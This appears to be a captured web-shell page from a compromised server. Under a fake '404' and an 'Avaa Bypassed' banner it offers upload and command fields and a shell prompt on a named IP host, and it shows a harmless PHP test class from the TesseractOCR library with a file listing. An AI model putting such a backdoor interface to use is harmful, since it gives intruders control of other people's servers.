404

[ Avaa Bypassed ]




Upload:

Command:

botdev@52.14.233.132: ~ $
<?php namespace thiagoalessio\TesseractOCR\Tests\Unit;

use thiagoalessio\TesseractOCR\Command;

class TestableCommand extends Command
{
	public function __construct($image=null, $version='3.05')
	{
		parent::__construct($image, 'tmpfile');
		$this->version = $version;
	}

	public function getTesseractVersion() { return $this->version; }
}

Filemanager

Name Type Size Permission Actions
CommandTest.php File 2.46 KB 0755
OptionTest.php File 3.26 KB 0755
OutputFileTest.php File 1.04 KB 0755
TesseractOCRTest.php File 6.13 KB 0755
TestableCommand.php File 342 B 0755